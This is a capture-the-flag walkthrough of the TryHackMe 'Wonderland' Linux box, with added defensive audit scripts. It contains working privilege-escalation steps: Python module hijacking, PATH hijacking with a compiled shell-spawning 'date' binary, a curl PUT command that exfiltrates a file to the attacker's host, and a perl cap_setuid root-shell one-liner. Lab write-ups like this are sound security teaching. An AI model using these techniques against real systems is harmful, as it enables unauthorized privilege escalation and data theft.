A medium Linux box from TryHackMe, get initial access by finding creds in site HTML, then escalate privilege through PATH vulnerabilities, and exploit an SUID binary for root

Recon

Running the standard nmap

sudo nmap -sC -sV -Pn -oA nmap/wonderland 10.10.224.95
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Navigating to the web page shows just a static HTML page

Enumerating the directories with

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u 10.10.224.95

And find a directory “/r/”

Navigating to it, the page tells you to follow the rabbit, so just try it out and spell “rabbit” out in the URL

“10.10.224.95/r/a/b/b/i/t/”

And get to a special page, where it tells you to open the door

Inspecting the page source, find some hidden creds in a paragraph styled display: none - alice:HowDothTheLittleCrocodileImproveHisShiningTail

<body>
    <h1>Open the door and enter wonderland</h1>
    <p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
    <p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
    </p>
    <p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
        the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
    <p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
    <img src="/img/alice_door.png" style="height: 50rem;">
</body>

SSH-ing into the box with those creds, get a shell as alice

ssh alice@10.10.224.95

Exploitation

In the home directory

alice@wonderland:~$ ls -la

drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py

Of note is walrus_and_the_carpenter.py; further enumeration with sudo -l reveals that alice can run this Python file as the “rabbit” user

sudo -l

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Looking at the Python script, it imports the “random” module and then prints random lines from a fixed set of lines

Looking at the python library path list by running

alice@wonderland:~$ python3 -c "import sys;print(sys.path)"

['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']

The first item, '', is the current directory - so the script is susceptible to a path-based vulnerability: a random.py file will first be looked for (and loaded from) the current directory, rather than the /usr/lib/python3.6/ directory where the real module lives

Creating a file called random.py in the home directory that spawns a bash shell, so that the script running as the “rabbit” user loads it instead of the real module

import os

# Loaded in place of the stdlib random module when the script runs via sudo
os.system("/bin/bash")

Then run the script as the rabbit user with sudo

alice@wonderland:~$ sudo -u rabbit python3.6 /home/alice/walrus_and_the_carpenter.py 
rabbit@wonderland:~$ whoami
rabbit
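As an added check (not part of the original writeup), a small audit that flags sudo rules of the shape shown above: a Python interpreter run without -I on a script whose directory the invoking user can write. One precision worth knowing: when Python runs a script file, sys.path[0] is the script's own directory (the '' entry shown above is what -c gives), so here /home/alice is searched before the stdlib; `python3 -I` drops that entry and PYTHONPATH. The `writable` predicate is injected so the sample runs offline; in a real audit use os.access as the invoking user.

```python
import os
import shlex

# Interpreter flags that keep a caller-writable directory out of the module
# search: -I (isolated mode) drops the script directory / '' from sys.path and
# ignores PYTHONPATH and the user site-packages.
SAFE_FLAGS = {"-I"}

def parse_sudo_rule(rule):
    """Turn a 'sudo -l' line like
    '(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py'
    into (runas_user, argv)."""
    rule = rule.strip()
    runas, sep, cmd = rule[1:].partition(")")
    if not rule.startswith("(") or not sep:
        raise ValueError("unexpected sudo rule: %r" % rule)
    return runas.strip(), shlex.split(cmd)

def python_rule_findings(rule, writable):
    """Findings for a sudo rule that runs a Python script as another user.
    `writable(path)` must answer whether the *invoking* user can write `path`;
    it is injected so the sample runs offline (use os.access(p, os.W_OK) in a
    real audit run as that user)."""
    runas, argv = parse_sudo_rule(rule)
    if not argv or "python" not in os.path.basename(argv[0]):
        return []
    flags = {a for a in argv[1:] if a.startswith("-")}
    scripts = [a for a in argv[1:] if not a.startswith("-")]
    findings = []
    if not flags & SAFE_FLAGS:
        findings.append("interpreter run without -I: the script's directory is "
                        "sys.path[0] and is searched before the stdlib")
    for script in scripts:
        script_dir = os.path.dirname(os.path.abspath(script))
        if writable(script_dir):
            findings.append("%s is writable by the invoking user: a random.py "
                            "there shadows the stdlib module when run as %s"
                            % (script_dir, runas))
        if writable(script):
            findings.append("%s itself is writable by the invoking user" % script)
    return findings

if __name__ == "__main__":
    # Constructed to mirror the box: alice owns /home/alice, root owns the script.
    rule = "(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py"
    for finding in python_rule_findings(rule, writable=lambda p: p == "/home/alice"):
        print("FINDING:", finding)
```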

Now as rabbit, there is a “teaParty” file with the SUID bit set in rabbit's home directory

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 10 Sep 2022 03:25:27 +0000
Ask very nicely, and I will give you some tea while you wait for him
rabbit@wonderland:/home/rabbit$ ls -la

-rw-r--r-- 1 rabbit rabbit   220 May 25  2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit  3771 May 25  2020 .bashrc
-rw-r--r-- 1 rabbit rabbit   807 May 25  2020 .profile
-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Exfiltrate the file with curl's PUT option (-T)

Start the PUT python server on the kali machine

python3 put-server.py --bind localhost 8000

Then exfiltrate from the victim

curl -T ./teaParty 10.6.107.137:8000

It can be disassembled with Ghidra, but I didn't want to download the 1.2 GB, so I just ran strings on the file and hoped for the best

strings ./teaParty

...
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
...

Can see that to output the message, teaParty runs the command “date” without using its full path - maybe it's susceptible to another PATH vulnerability?

Looking at the PATH variable, see that you can add /tmp to the beginning of it with

export PATH=/tmp:$PATH

Now a custom “date” binary placed in /tmp will be found first in the PATH search, so it can give us a shell as the more privileged user

Then on the kali box, create date.c that launches a bash shell

#include <stdlib.h>

/* Stands in for the real date(1) once /tmp is first in PATH */
int main(void) {
    system("/bin/bash");
    return 0;
}

Then compile

gcc date.c -o date

And then transfer the file to the victim and into the /tmp folder

Then run the teaParty executable to get a shell as “hatter”
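The same weakness can be found from the defending side. Below is an added audit (not from the original writeup) that scans `strings` output for shell one-liners and reports command words that are bare names rather than absolute paths; the sample strings are a constructed excerpt mirroring the output above, and `audit_binary` assumes a `strings` binary is on the auditing host.

```python
import re
import shlex
import subprocess

# Constructed excerpt of `strings ./teaParty` output (not the full dump).
SAMPLE_STRINGS = """\
Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
"""

# Shell operators that start a new command: && || ; |
_SPLIT = re.compile(r"&&|\|\||;|\|")
# Anything that looks like a shell one-liner handed to system()/popen().
_LOOKS_SHELL = re.compile(r"^/|&&|\|\||;|\||\$\(|`")

def command_words(line):
    """First word of each command segment in a shell string ('echo' and 'date'
    for "echo hi && date -R"). Heuristic: splits on operators even inside quotes."""
    words = []
    for segment in _SPLIT.split(line):
        try:
            tokens = shlex.split(segment)
        except ValueError:          # unbalanced quote: not a command string
            return []
        if tokens:
            words.append(tokens[0])
    return words

def unqualified_commands(strings_output):
    """Return (command, line) pairs for command words that are bare names, not
    absolute paths: a setuid program running these resolves them through the
    caller's PATH. The fix is an absolute path (or resetting PATH first)."""
    hits = []
    for line in strings_output.splitlines():
        if not _LOOKS_SHELL.search(line):
            continue
        for word in command_words(line):
            if re.fullmatch(r"[A-Za-z0-9_.-]+", word):
                hits.append((word, line))
    return hits

def audit_binary(path):
    """Run `strings` on a real file (for instance each result of
    `find / -perm -4000 -type f`) and report its unqualified command words."""
    out = subprocess.run(["strings", path], capture_output=True,
                         text=True, check=True).stdout
    return unqualified_commands(out)
```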

Inside hatter's home directory is a password.txt file, unfortunately only containing the password of the “hatter” user

WhyIsARavenLikeAWritingDesk?

SSH in as the hatter with the password again

Enumerating again from the beginning, see that this user can run perl, which has the cap_setuid file capability set

hatter@wonderland:/home/hatter$ getcap -r / 2>/dev/null

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
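An added parser (not from the original writeup) for the getcap output above: it reads cap_from_text(3) clauses such as cap_setuid+ep, handles the newer `path cap=ep` layout as well as the `path = cap+ep` one shown, and reports files whose permitted or effective set holds an identity-changing capability. The sample below is a constructed copy of the three lines above; the list of capabilities treated as privileged is my own choice.

```python
import re

# Capabilities that let a process change identity or bypass file permissions.
PRIVILEGED_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                   "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace"}

# Constructed copy of the `getcap -r / 2>/dev/null` output from the box.
SAMPLE_GETCAP = """\
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""

def parse_capset(spec):
    """Parse a cap_from_text(3) string such as 'cap_net_raw,cap_setuid+ep' or
    'cap_setuid=ei cap_setuid-e' into {cap_name: set_of_flags}."""
    caps = {}
    for clause in spec.split():
        m = re.fullmatch(r"([a-z0-9_,]+)([+=-])([eip]*)", clause)
        if not m:
            raise ValueError("unparsable capability clause: %r" % clause)
        names, op, flags = m.groups()
        for name in names.split(","):
            cur = caps.setdefault(name, set())
            if op == "=":
                cur.clear()
            if op in "+=":
                cur.update(flags)
            else:
                cur.difference_update(flags)
    return caps

def risky_file_caps(getcap_output):
    """Return (path, cap) for files carrying a privileged capability in the
    permitted or effective set. Permitted ('p') alone is enough to flag: the
    process can raise it into its effective set itself. Paths with spaces are
    not handled."""
    hits = []
    for line in getcap_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        path, spec = parts
        if spec.startswith("= "):        # older libcap layout: 'path = caps'
            spec = spec[2:]
        for cap, flags in parse_capset(spec).items():
            if cap in PRIVILEGED_CAPS and flags & {"e", "p"}:
                hits.append((path, cap))
    return hits
```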

Using GTFOBins, there is a copy-and-paste solution to exploit the cap_setuid capability

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

And get root!